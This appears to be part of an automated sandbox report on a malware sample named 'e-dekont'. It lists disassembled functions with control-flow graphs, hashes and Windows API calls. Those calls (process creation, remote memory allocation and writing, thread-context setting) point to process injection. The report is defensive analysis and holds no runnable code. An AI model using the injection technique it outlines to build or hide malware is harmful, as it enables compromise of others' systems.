                                                        • Opcode ID: edc027324a67a0c4671459e7571b1205fcf43a80ae2cb142363cbb151f19a110
                                                        • Instruction ID: 0e7e0e38c18e6c34e1a9ab8e0969ea3e06dbfac932e88e1dec97670e60dcf2d1
                                                        • Opcode Fuzzy Hash: edc027324a67a0c4671459e7571b1205fcf43a80ae2cb142363cbb151f19a110
                                                        • Instruction Fuzzy Hash: 03B17CF0F14218CFEB1C8F9CC544AADB7B6BB85780F248456D60AAB296C7749C85CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073FF110 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 628 73ff110-73ff133 629 73ff13a-73ff2eb 628->629 630 73ff135 628->630 646 73ff297-73ff29b 629->646 630->629 647 73ff1b5-73ff225 646->647 648 73ff2a1-73ff318 call 73ff0b8 646->648 665 73ff227 call 7610040 647->665 666 73ff227 call 76107dd 647->666 667 73ff227 call 761001e 647->667 657 73ff31e-73ff324 648->657 658 73ff177-73ff17c 648->658 657->658 660 73ff238-73ff25d 658->660 661 73ff182-73ff183 658->661 660->646 661->660 663 73ff22d-73ff237 665->663 666->663 667->663
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q
                                                        • API String ID: 0-3743469327
                                                        • Opcode ID: 83972f8bd40ac469c5708afdf4b51591cab97a9335d6c0cc2c18d7d550a891da
                                                        • Instruction ID: 03e0cbc88df4bc1895da0cdd5f8343770865d9b6cfe0c4fb451258f5e525f4e3
                                                        • Opcode Fuzzy Hash: 83972f8bd40ac469c5708afdf4b51591cab97a9335d6c0cc2c18d7d550a891da
                                                        • Instruction Fuzzy Hash: 3F61D4B8E04209DFEB08CFA9C984AEDBBF6BF89340F108029D909AB355D7345945CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 073F50E0 Relevance: 2.6, Strings: 2, Instructions: 71COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 818 73f50e0-73f50ec 819 73f50ee-73f510e 818->819 820 73f5153-73f5166 818->820 821 73f5115-73f511a 819->821 822 73f5110 819->822 824 73f5179-73f5180 820->824 825 73f5168-73f5177 820->825 834 73f511d call 73f51e8 821->834 835 73f511d call 73f51d8 821->835 822->821 827 73f5187-73f5194 824->827 825->827 826 73f5123 828 73f512a-73f5146 826->828 827->828 829 73f514f-73f5150 828->829 830 73f5148 828->830 831 73f51bd-73f51c1 829->831 830->826 830->829 830->831 832 73f5196-73f51b8 830->832 833 73f5152 830->833 832->828 833->820 834->826 835->826
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666133910.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73f0000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 3H5$3H5
                                                        • API String ID: 0-2752242361
                                                        • Opcode ID: cb00e972d4a0e296e98d891652655938a6fc57f5cf8bfa8e2c54d604542be5e0
                                                        • Instruction ID: a375c440a9d8a2f421a054aa96f8ce787cd272247bf374f735c0040a9c826c5c
                                                        • Opcode Fuzzy Hash: cb00e972d4a0e296e98d891652655938a6fc57f5cf8bfa8e2c54d604542be5e0
                                                        • Instruction Fuzzy Hash: C22128B0D14609EFDB48CFA9D9409AEBBF5BF8A340F14D5AAD108E7314E730AA55CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07615E3D Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 836 7615e3d-7615edd 839 7615f16-7615f36 836->839 840 7615edf-7615ee9 836->840 847 7615f38-7615f42 839->847 848 7615f6f-7615f9e 839->848 840->839 841 7615eeb-7615eed 840->841 843 7615f10-7615f13 841->843 844 7615eef-7615ef9 841->844 843->839 845 7615efb 844->845 846 7615efd-7615f0c 844->846 845->846 846->846 849 7615f0e 846->849 847->848 850 7615f44-7615f46 847->850 854 7615fa0-7615faa 848->854 855 7615fd7-7616091 CreateProcessA 848->855 849->843 852 7615f69-7615f6c 850->852 853 7615f48-7615f52 850->853 852->848 856 7615f54 853->856 857 7615f56-7615f65 853->857 854->855 858 7615fac-7615fae 854->858 868 7616093-7616099 855->868 869 761609a-7616120 855->869 856->857 857->857 859 7615f67 857->859 860 7615fd1-7615fd4 858->860 861 7615fb0-7615fba 858->861 859->852 860->855 863 7615fbc 861->863 864 7615fbe-7615fcd 861->864 863->864 864->864 865 7615fcf 864->865 865->860 868->869 879 7616130-7616134 869->879 880 7616122-7616126 869->880 882 7616144-7616148 879->882 883 7616136-761613a 879->883 880->879 881 7616128 880->881 881->879 885 7616158-761615c 882->885 886 761614a-761614e 882->886 883->882 884 761613c 883->884 884->882 888 761616e-7616175 885->888 889 761615e-7616164 885->889 886->885 887 7616150 886->887 887->885 890 7616177-7616186 888->890 891 761618c 888->891 889->888 890->891 893 761618d 891->893 893->893
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0761607E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 1856d6e9aa75407e889bd285883482a08ed4f714b48e9fb128ea4599890a23b5
                                                        • Instruction ID: 6c8fb2971a9fb0f048135303c3071c613409ebfaa2dddd2c40d03f70a8172059
                                                        • Opcode Fuzzy Hash: 1856d6e9aa75407e889bd285883482a08ed4f714b48e9fb128ea4599890a23b5
                                                        • Instruction Fuzzy Hash: 24A17CB1D0021ADFDB24CFA8C8457DDBBB2BF44314F1881A9E85AA7250DB749985CF92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07615E48 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 894 7615e48-7615edd 896 7615f16-7615f36 894->896 897 7615edf-7615ee9 894->897 904 7615f38-7615f42 896->904 905 7615f6f-7615f9e 896->905 897->896 898 7615eeb-7615eed 897->898 900 7615f10-7615f13 898->900 901 7615eef-7615ef9 898->901 900->896 902 7615efb 901->902 903 7615efd-7615f0c 901->903 902->903 903->903 906 7615f0e 903->906 904->905 907 7615f44-7615f46 904->907 911 7615fa0-7615faa 905->911 912 7615fd7-7616091 CreateProcessA 905->912 906->900 909 7615f69-7615f6c 907->909 910 7615f48-7615f52 907->910 909->905 913 7615f54 910->913 914 7615f56-7615f65 910->914 911->912 915 7615fac-7615fae 911->915 925 7616093-7616099 912->925 926 761609a-7616120 912->926 913->914 914->914 916 7615f67 914->916 917 7615fd1-7615fd4 915->917 918 7615fb0-7615fba 915->918 916->909 917->912 920 7615fbc 918->920 921 7615fbe-7615fcd 918->921 920->921 921->921 922 7615fcf 921->922 922->917 925->926 936 7616130-7616134 926->936 937 7616122-7616126 926->937 939 7616144-7616148 936->939 940 7616136-761613a 936->940 937->936 938 7616128 937->938 938->936 942 7616158-761615c 939->942 943 761614a-761614e 939->943 940->939 941 761613c 940->941 941->939 945 761616e-7616175 942->945 946 761615e-7616164 942->946 943->942 944 7616150 943->944 944->942 947 7616177-7616186 945->947 948 761618c 945->948 946->945 947->948 950 761618d 948->950 950->950
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0761607E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: c433c2de1e8f709497625ade9074d77a68f32604c5e6881b49e12a5f49a01dda
                                                        • Instruction ID: 1b7edbd5edfb874ef0e6e0962e473896b4ff28f81bd0335fc3c46389ee6205f8
                                                        • Opcode Fuzzy Hash: c433c2de1e8f709497625ade9074d77a68f32604c5e6881b49e12a5f49a01dda
                                                        • Instruction Fuzzy Hash: D3917DB1D0021ADFDB20CFA8C8457DDBBB2BF44314F1881A9E85AA7350DB749995CF92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0295ADB0 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 951 295adb0-295adcf 952 295add1-295adde call 2959d10 951->952 953 295adfb-295adff 951->953 958 295adf4 952->958 959 295ade0 952->959 954 295ae01-295ae0b 953->954 955 295ae13-295ae54 953->955 954->955 962 295ae56-295ae5e 955->962 963 295ae61-295ae6f 955->963 958->953 1006 295ade6 call 295b420 959->1006 1007 295ade6 call 295b458 959->1007 1008 295ade6 call 295b448 959->1008 962->963 965 295ae71-295ae76 963->965 966 295ae93-295ae95 963->966 964 295adec-295adee 964->958 969 295af30-295aff0 964->969 967 295ae81 965->967 968 295ae78-295ae7f call 2959d1c 965->968 970 295ae98-295ae9f 966->970 972 295ae83-295ae91 967->972 968->972 1001 295aff2-295aff5 969->1001 1002 295aff8-295b023 GetModuleHandleW 969->1002 973 295aea1-295aea9 970->973 974 295aeac-295aeb3 970->974 972->970 973->974 976 295aeb5-295aebd 974->976 977 295aec0-295aec9 call 2959d2c 974->977 976->977 982 295aed6-295aedb 977->982 983 295aecb-295aed3 977->983 985 295aedd-295aee4 982->985 986 295aef9-295af06 982->986 983->982 985->986 987 295aee6-295aef6 call 2959d3c call 2959d4c 985->987 992 295af29-295af2f 986->992 993 295af08-295af26 986->993 987->986 993->992 1001->1002 1003 295b025-295b02b 1002->1003 1004 295b02c-295b040 1002->1004 1003->1004 1006->964 1007->964 1008->964
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0295B016
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 21eceb1aad15f6a300a1934cda8b4c3b62e3153e7c2c628634e394598048c8d0
                                                        • Instruction ID: e0f286dd22738d38687f192ede55f402499b2644690ba53930e05a6b435e9bb3
                                                        • Opcode Fuzzy Hash: 21eceb1aad15f6a300a1934cda8b4c3b62e3153e7c2c628634e394598048c8d0
                                                        • Instruction Fuzzy Hash: D4814570A007558FD724DF2AD44175ABBF5FF88304F108A29D88AD7A50D734E949CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0295590D Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 029559C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: a76993d02d29b592eba2fa48907b366c617a6d77a142381a89f8e032ea334062
                                                        • Instruction ID: 462e1101ebd2ba896ad4f43dc95ecadd919d1709c52c9991182c53a175f7c207
                                                        • Opcode Fuzzy Hash: a76993d02d29b592eba2fa48907b366c617a6d77a142381a89f8e032ea334062
                                                        • Instruction Fuzzy Hash: 5141F1B0D00629CFDB24DFA9C9847DDBBB5BF48304F64806AD418AB251DB75698ACF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 029544B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 029559C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: b4602006e2d0427a9f0cae4714b0042a05fdd4aabd228ffea87f888fc7a0e652
                                                        • Instruction ID: beec43856ef82cafd45ffc4b4e78a2b4e64ed2d8295a5ecb3cd687043805e9c3
                                                        • Opcode Fuzzy Hash: b4602006e2d0427a9f0cae4714b0042a05fdd4aabd228ffea87f888fc7a0e652
                                                        • Instruction Fuzzy Hash: 2A41D2B0D0071DCBDB24DFA9C8447DEBBB5BF49304F64806AD408AB255DB75A94ACF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 05063FA0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05064061
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1664124841.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5060000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: bbfbf041b4273da4ee5c1cbe9194aaa38e1b494f5de02a6c74439ae448ebfc37
                                                        • Instruction ID: 3e4f6e5bc39e6d420271fa9912a31419c397d5a825900bff7ac32b834c23bc41
                                                        • Opcode Fuzzy Hash: bbfbf041b4273da4ee5c1cbe9194aaa38e1b494f5de02a6c74439ae448ebfc37
                                                        • Instruction Fuzzy Hash: 934116B4A00319DFDB14CF99D488AAEBBF6FB88314F24C459D519AB321D775A841CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07615BB9 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07615C50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 7891a37ba92d335e8434dda205a456fce11566a74872917ee1012008cc4c5976
                                                        • Instruction ID: 26191ea4bb3a6da3097aa2052f07d70f74d04b72444ba66f7317f884a6d1d52e
                                                        • Opcode Fuzzy Hash: 7891a37ba92d335e8434dda205a456fce11566a74872917ee1012008cc4c5976
                                                        • Instruction Fuzzy Hash: 3F2155B29003499FCB10CFA9C884BDEBBF4FF88310F14842AE959A7250C7789950CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07615BC0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07615C50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 7e5648baa3eeaf8cc5615a3d58f324d765b156e0774883bc5794b149f4ae81f6
                                                        • Instruction ID: 18221bea1784ff4257f90c2070feffcb4102017fbb9116b9428e3c08a9321356
                                                        • Opcode Fuzzy Hash: 7e5648baa3eeaf8cc5615a3d58f324d765b156e0774883bc5794b149f4ae81f6
                                                        • Instruction Fuzzy Hash: A32144B19003599FCB10CFA9C884BEEBBF5FF88310F14842AE959A7251C7789954CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07615CA9 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07615D30
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 996fa8388da89ef11fcc8502da9128053e8f38b589af0e52e2a2d7339fe9d33b
                                                        • Instruction ID: 2d82f05cf9f39ae1997f679df3de2a492d0cf6be4b961ce13e89602cca63f4ea
                                                        • Opcode Fuzzy Hash: 996fa8388da89ef11fcc8502da9128053e8f38b589af0e52e2a2d7339fe9d33b
                                                        • Instruction Fuzzy Hash: C02128B1C002599FCB10DFAAC884BDEFBF5FF48320F10842AE559A7250C7349955CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07615A20 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07615AA6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 4932e6295f05fe57b52c326688624e7e7cc8e315ee0bb371e20e2a845a0b2121
                                                        • Instruction ID: 8a4e2dba39cac33b09e5e40e0167e68eef943fd14833a107bfa41159a7a0f29e
                                                        • Opcode Fuzzy Hash: 4932e6295f05fe57b52c326688624e7e7cc8e315ee0bb371e20e2a845a0b2121
                                                        • Instruction Fuzzy Hash: BB2137B1D002098FDB10DFAAC4857EEFBF4EF88324F14842AD45AA7251D778A945CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0295B410 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0295D366,?,?,?,?,?), ref: 0295D427
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 081645b7f6a03c7a059fc5192188e5d857911a2348c6984876202624267eebe4
                                                        • Instruction ID: 346c8c6772df8f515612bea7eda8acb6844f512675cb1a81ef748f6a103b6fc6
                                                        • Opcode Fuzzy Hash: 081645b7f6a03c7a059fc5192188e5d857911a2348c6984876202624267eebe4
                                                        • Instruction Fuzzy Hash: B42114B5900318DFDB10CF9AD984AEEBBF8EB48310F10805AE958A3350C374A940CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0295D398 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0295D366,?,?,?,?,?), ref: 0295D427
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 5395a0601cee30397edaa2d3d4a55e01e2b8f707ed5569a90c42692a344e57a7
                                                        • Instruction ID: 6a1674aafdbaaa89e6eb62b59212d1c37ff2dfa1878a087a469ef646be9a40fd
                                                        • Opcode Fuzzy Hash: 5395a0601cee30397edaa2d3d4a55e01e2b8f707ed5569a90c42692a344e57a7
                                                        • Instruction Fuzzy Hash: E421E4B5D00258DFDB10CFA9D584ADEBBF4FB08310F14841AE958A3350D378A941CF65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07615CB0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07615D30
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 5a69ee8e6f3d172227c17da57106e715263c6095b74bea71f4517313e2407680
                                                        • Instruction ID: e6484cd998f278ea8393ed50f7a87b0d1c2c9cd4ab0f5c3758a2000a05c6b30b
                                                        • Opcode Fuzzy Hash: 5a69ee8e6f3d172227c17da57106e715263c6095b74bea71f4517313e2407680
                                                        • Instruction Fuzzy Hash: B42128B1C002599FCB10DFAAC884BDEFBF5FF48310F10842AE559A7250C7349554CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07615A28 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07615AA6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: d121f4216f2e47d757f4d33681cd215d7a8bd51bb01dde277f9a847c7f7d85df
                                                        • Instruction ID: e8337cfdac604d7844a0fed7b292d6311704f035cd073241a9363f5888ce329e
                                                        • Opcode Fuzzy Hash: d121f4216f2e47d757f4d33681cd215d7a8bd51bb01dde277f9a847c7f7d85df
                                                        • Instruction Fuzzy Hash: 462138B1D002098FDB10DFAAC4857EEFBF4EF88324F14842AD459A7251C7789944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 076180E1 Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076180AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 77752e77e527d9d709678b8293bf013aac0736c8eba8f7c41eb9365fa2e0294d
                                                        • Instruction ID: d2a2867a60d301de02ae2a6b870d1b993f63bf33142057844040c2e8794530f0
                                                        • Opcode Fuzzy Hash: 77752e77e527d9d709678b8293bf013aac0736c8eba8f7c41eb9365fa2e0294d
                                                        • Instruction Fuzzy Hash: B311B4B2A0431A8FDB11DFA5D9093EEBBF1AF44320F194469D442B7350CB795900CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07615AF8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07615B6E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 6c2b4fe3faea1122637b1375c6a7fda4207e7ea59039fe605b3b21d2d865df8d
                                                        • Instruction ID: 34716beaedc9baf7566f0f69c6dc7e08b3ce898f699e164c2e82c3a1156bf534
                                                        • Opcode Fuzzy Hash: 6c2b4fe3faea1122637b1375c6a7fda4207e7ea59039fe605b3b21d2d865df8d
                                                        • Instruction Fuzzy Hash: 54115CB68002499FCB10DFA9C844BDEFFF5EF88324F148419D555A7250C7359550CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0295B048 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0295B491,00000800,00000000,00000000), ref: 0295B682
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: e6cf9cc1ba4bfbe5273b3dbeb3e5bbecd00760faf64df91a9c300ffaa0018086
                                                        • Instruction ID: 37a393b428f863fa385e3de351cea8f9aaa38e9df05db75ac1dfb1e0787ba18d
                                                        • Opcode Fuzzy Hash: e6cf9cc1ba4bfbe5273b3dbeb3e5bbecd00760faf64df91a9c300ffaa0018086
                                                        • Instruction Fuzzy Hash: D01126B6D013589FDB10CF9AD444AEEFBF4EB48328F10842AE859A7210C375A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0295B610 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0295B491,00000800,00000000,00000000), ref: 0295B682
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1660184429.0000000002950000.00000040.00000800.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2950000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 6839bd95b5a0e29ac4600a6c5b0a83cd9f629517b9a5a2c77970444863070aa6
                                                        • Instruction ID: 9d37d64a657b09b8fdc05a76bd04b71ac7fbb1e18566d936e132e45edfd59b65
                                                        • Opcode Fuzzy Hash: 6839bd95b5a0e29ac4600a6c5b0a83cd9f629517b9a5a2c77970444863070aa6
                                                        • Instruction Fuzzy Hash: A81123B6D013588FCB10CFAAD544BDEFBF4EB58324F10842AD859A7610C375A546CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 07615B00 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07615B6E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1666345195.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7610000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 2609d7eb0d92f476349e64b5ef1383ffc2283a0536c69d2f29558747bcceb241
                                                        • Instruction ID: 8c36bec88dd6645c89f1d406c2bd9f98da41acbd65b08ae7e81621ed1ffeedc5
                                                        • Opcode Fuzzy Hash: 2609d7eb0d92f476349e64b5ef1383ffc2283a0536c69d2f29558747bcceb241
